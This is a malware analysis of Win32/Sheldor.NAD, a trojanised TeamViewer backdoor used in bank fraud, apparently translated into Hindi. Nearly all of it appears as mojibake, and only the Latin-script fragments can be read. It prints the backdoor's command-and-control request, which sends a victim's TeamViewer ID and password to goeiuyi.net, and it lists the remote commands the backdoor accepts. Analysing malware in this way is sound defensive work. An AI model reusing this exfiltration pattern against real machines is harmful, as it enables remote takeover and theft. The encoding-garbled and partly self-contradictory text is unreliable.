рд╣рд╛рд▓ рд╣реА рдореЗрдВ, ESET рд╡рд┐рд╢реНрд▓реЗрд╖рдХреЛрдВ рдиреЗ рдПрдХ рджрд┐рд▓рдЪрд╕реНрдк рдореИрд▓рд╡реЗрдпрд░ рдХреА рдЦреЛрдЬ рдХреА - Win32 / Sheldor.NAD, рдЬреЛ рджреВрд░рд╕реНрде рдХрдВрдкреНрдпреВрдЯрд░ рдкреНрд░рд╢рд╛рд╕рди рдХреЗ рд▓рд┐рдП рд▓реЛрдХрдкреНрд░рд┐рдп рд╕реЙрдлреНрдЯрд╡реЗрдпрд░ рдХрд╛ рдПрдХ рд╕рдВрд╢реЛрдзрди рд╣реИ - рдЯреАрдорд╡реНрдпреВрдЕрд░ред
рд╕рдореВрд╣-рдЖрдИрдмреА рджреНрд╡рд╛рд░рд╛ рд╢реБрд░реВ рдХреА рдЧрдИ рдФрд░ рджреВрд░рд╕реНрде рдмреИрдВрдХрд┐рдВрдЧ рдкреНрд░рдгрд╛рд▓рд┐рдпреЛрдВ рдореЗрдВ рдзреЛрдЦрд╛рдзрдбрд╝реА рд╕реЗ рд╕рдВрдмрдВрдзрд┐рдд рдШрдЯрдирд╛ рдХреА рдЬрд╛рдВрдЪ рдХреЗ рднрд╛рдЧ рдХреЗ рд░реВрдк рдореЗрдВ рдкрд░реАрдХреНрд╖рд╛ рдХреЗ рджреМрд░рд╛рди рдпрд╣ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдХреА рдЧрдИ рдереАред рдЙрд╕реА рд╕рдордп, рд╣рдорд▓рд╛рд╡рд░ рдХрдИ рдирдХрд▓реА рд▓реЗрдирджреЗрди рдХрд░рдиреЗ рдФрд░ рд▓рдЧрднрдЧ 5 рдорд┐рд▓рд┐рдпрди рд░реВрдмрд▓ рдЪреБрд░рд╛рдиреЗ рдореЗрдВ рдХрд╛рдордпрд╛рдм рд░рд╣реЗред
Win32 / Sheldor.NAD - рдЯреНрд░реЛрдЬрди рдЗрдВрд╕реНрдЯреЙрд▓рд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕реНрдерд╛рдкрд┐рдд рдХрд┐рдпрд╛ рдЧрдпрд╛ рд╣реИ, рдЬреЛ рджреВрд░рд╕реНрде рдкреНрд░рд╢рд╛рд╕рди рдХреЗ рд▓рд┐рдП рд▓реЛрдХрдкреНрд░рд┐рдп рдкреИрдХреЗрдЬ рдХрд╛ рдПрдХ рд╕рдВрд╢реЛрдзрд┐рдд рд╕рдВрд╕реНрдХрд░рдг рдкреЗрд╢ рдХрд░рддрд╛ рд╣реИ - рд╕рд┐рд╕реНрдЯрдо рдореЗрдВ рдкрд╛рдВрдЪрд╡реЗрдВ рд╕рдВрд╕реНрдХрд░рдг рдХрд╛ TeamViewerред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдХрдИ рдШрдЯрдХреЛрдВ рдореЗрдВ рдПрдХ рдХрд╛рдиреВрдиреА рдбрд┐рдЬрд┐рдЯрд▓ рд╣рд╕реНрддрд╛рдХреНрд╖рд░ рд╢рд╛рдорд┐рд▓ рд╣реИрдВ:
рдЪреВрдВрдХрд┐, рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ, рдЗрд╕ рд╕рдВрд╢реЛрдзрд┐рдд рд╕рдВрд╕реНрдХрд░рдг рдореЗрдВ, рд╕рднреА рдкрд░рд┐рд╡рд░реНрддрди tv.dll рдореЙрдбреНрдпреВрд▓ рдореЗрдВ рд╕рдорд╛рд╣рд┐рдд рд╣реИрдВ, рдЬрдм рд╣рдордиреЗ рдЗрд╕ рдкрд┐рдЫрд▓реЗ рджрд░рд╡рд╛рдЬреЗ рдХреА рдЦреЛрдЬ рдХреА, рддреЛ рдЕрдзрд┐рдХрд╛рдВрд╢ рдПрдВрдЯреА-рд╡рд╛рдпрд░рд╕ рд╕рдорд╛рдзрд╛рдиреЛрдВ рдиреЗ рдЗрд╕реЗ рдиреЛрдЯрд┐рд╕ рдирд╣реАрдВ рдХрд┐рдпрд╛, рдХреНрдпреЛрдВрдХрд┐ рдХреЛрдб рдХрд╛ рд╕реАрдзреЗ рд╡рд┐рд╢реНрд▓реЗрд╖рдг рдХрд┐рдП рдмрд┐рдирд╛, рдпрд╣ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд░рдирд╛ рдХрд┐ рдпрд╣ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдХрд╛рд░реНрдпрдХреНрд░рдо рдЗрддрдирд╛ рд╕рд░рд▓ рдирд╣реАрдВ рдерд╛ред
рдЕрдм рдЪреАрдЬреЗрдВ рдмрд╣реБрдд рдмреЗрд╣рддрд░ рд╣реИрдВ - http://www.virustotal.com/file-scan/report.html?id=9f3ff234d5481da1c00a2466bc83f7bda5fb9a36eb00bb0db821a6dc3669fe4e6-129527272165 ред
рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдкреНрд░реЛрдЧреНрд░рд╛рдо рдХреЛ рд╕реНрдерд╛рдкрд┐рдд рдХрд░рдиреЗ рдХреЗ рддреБрд░рдВрдд рдмрд╛рдж, рд╕рд░реНрд╡рд░ рднрд╛рдЧ рд╢реБрд░реВ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИ рдФрд░ рдлрд┐рд░ рд╕рд╛рдЗрдмрд░ рдЕрдкрд░рд╛рдзрд┐рдпреЛрдВ рдХреЗ рдкреНрд░рд╢рд╛рд╕рдирд┐рдХ рдкреИрдирд▓ рдХреЗ рд╕рд╛рде рд▓рдЧрд╛рддрд╛рд░ рдмрд╛рддрдЪреАрдд рд╣реЛрддреА рд╣реИ рдЬреЛ рдХрд┐рд╕реА рднреА рд╕рдордп рд╕рдВрдХреНрд░рдорд┐рдд рдХрдВрдкреНрдпреВрдЯрд░ рд╕реЗ рдЬреБрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВ рдФрд░ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░реЛрдВ рдХреЗ рд╕рд╛рде рдХреЛрдИ рднреА рдХрд╛рд░реНрдп рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдЬрд┐рд╕рдХреЗ рдЦрд╛рддреЗ рдореЗрдВ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдкреНрд░реЛрдЧреНрд░рд╛рдо рд▓реЙрдиреНрдЪ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ рдпрд╛ рдЗрд╕рдХреА рдирд┐рдЧрд░рд╛рдиреА рдХрд░реЗрдВред
рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдкреИрдирд▓ рдФрд░ рд╕рдВрдХреНрд░рдорд┐рдд рдорд╢реАрди рдХреЗ рдмреАрдЪ рд╕реВрдЪрдирд╛ рдХрд╛ рдЖрджрд╛рди-рдкреНрд░рджрд╛рди рдореБрдЦреНрдп рд░реВрдк рд╕реЗ рдирд┐рдореНрдирд╛рдиреБрд╕рд╛рд░ рд╣реИ:
GET /getinfo.php?id=414%20034%20883&pwd=6655&stat=1 HTTP / 1.1
рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛-рдПрдЬреЗрдВрдЯ: x3
рд╣реЛрд╕реНрдЯ: goeiuyi.net
рдЬрд╣рд╛рдБ id = 414 034 883 рдлрд╝реАрд▓реНрдб рдЯреАрдорд╡реНрдпреВрдЕрд░ рдиреЗрдЯрд╡рд░реНрдХ рдкрд░ рд╕рддреНрд░ рдкрд╣рдЪрд╛рдирдХрд░реНрддрд╛ рд╣реИ, рдФрд░ pwd = 6655 рдкрд╛рд╕рд╡рд░реНрдб рд╣реИред рдЗрди рджреЛ рдкрд╣рдЪрд╛рдирдХрд░реНрддрд╛рдУрдВ рдХреЗ рд╕рд╛рде, рдЖрдк рджреБрдирд┐рдпрд╛ рдореЗрдВ рдХрд╣реАрдВ рд╕реЗ рднреА рджреВрд░рд╕реНрде рдХрдВрдкреНрдпреВрдЯрд░ рд╕реЗ рдЬреБрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВред рдирд┐рдпрдВрддреНрд░рдг рдХреЗрдВрджреНрд░ рд╕реЗ рдирд┐рдореНрдирд▓рд┐рдЦрд┐рдд рдХрдорд╛рдВрдб рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
рдирд┐рд╖реНрдкрд╛рджрд┐рдд - winapi рдлрд╝рдВрдХреНрд╢рди рдХреЙрд▓ рдХрд░рддрд╛ рд╣реИ ShellExecute ()
power_off - EWX_POWEROFF рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд╕рд╛рде winapi рдлрд╝рдВрдХреНрд╢рди ExitWindowsEx () рдХреЛ рдХреЙрд▓ рдХрд░рддрд╛ рд╣реИ
рд╢рдЯрдбрд╛рдЙрди - winapi рдлрд╝рдВрдХреНрд╢рди рдХреЛ ExitWindowsEx () EWX_SHUTDOWN рдкреИрд░рд╛рдореАрдЯрд░ рдХреЗ рд╕рд╛рде рдХреЙрд▓ рдХрд░рддрд╛ рд╣реИ
рдХрд┐рд▓рдмреЙрдЯ - рд╕рднреА рд╕реНрдерд╛рдкрд┐рдд рдлрд╝рд╛рдЗрд▓реЛрдВ рдХреЛ рд╣рдЯрд╛рддрд╛ рд╣реИ рдФрд░ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬрд┐рдпреЛрдВ рдХреЛ рд╕рд╛рдл рдХрд░рддрд╛ рд╣реИ
рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреА рдкрд╕рдВрдж рдЯреАрдо рд╡реНрдпреВрдЕрд░ рдкреНрд░реЛрдЧреНрд░рд╛рдо рдкрд░ рд╕рдВрдпреЛрдЧ рд╕реЗ рдирд╣реАрдВ рдмрдиреА рдереА, рдХреНрдпреЛрдВрдХрд┐ рдпрд╣ рд╕рд┐рд╕реНрдЯрдо рдкреНрд░рд╢рд╛рд╕рдХреЛрдВ рдХреЗ рд╕рд╛рде рдХрд╛рдлреА рд▓реЛрдХрдкреНрд░рд┐рдп рд╣реИ, рдФрд░ рдЖрдкрдХреЛ рддреБрд░рдВрдд рдХрд┐рд╕реА рдЪрд╛рд▓ рдкрд░ рд╕рдВрджреЗрд╣ рдирд╣реАрдВ рд╣реЛ рд╕рдХрддрд╛ред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рд░рд┐рдореЛрдЯ рдХрдВрдкреНрдпреВрдЯрд░ рдХрд╛ рдХрдиреЗрдХреНрд╢рди рдЯреАрдорд╡реНрдпреВрдЕрд░ рдХреЗ рд▓рд┐рдП рдордзреНрдпрд╕реНрде рд╕рд░реНрд╡рд░реЛрдВ рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ рд╣реЛрддрд╛ рд╣реИ, рдЬреЛ рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ рдЙрдирдХреЗ рдЖрдИрдкреА рдкрддреЗ рдХреЛ рдЫрд┐рдкрд╛рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ рдЬрд┐рд╕рд╕реЗ рдХрдиреЗрдХреНрд╢рди рдмрдирд╛рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдпрд╣ рдПрдХ рдЬрд╛рдВрдЪ рдХреЗ рд▓рд┐рдП рдХрдо рд╕рдмреВрдд рднреА рдЫреЛрдбрд╝рддрд╛ рд╣реИ, рдХреНрдпреЛрдВрдХрд┐ рдЯреАрдорд╡реНрдпреВрдЕрд░ рдкреНрд░реЛрдЧреНрд░рд╛рдо рдХреЗ рдбреЗрд╡рд▓рдкрд░ рд╕реЗ рдЖрд╡рд╢реНрдпрдХ рдбреЗрдЯрд╛ рдХрд╛ рдЕрдиреБрд░реЛрдз рдХрд░рдиреЗ рдХреА рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдмрд▓реНрдХрд┐ рддреНрд╡рд░рд┐рдд рд╣реИ рдФрд░ рдЗрд╕рдореЗрдВ рдХрдИ рдорд╣реАрдиреЗ рд▓рдЧ рд╕рдХрддреЗ рд╣реИрдВред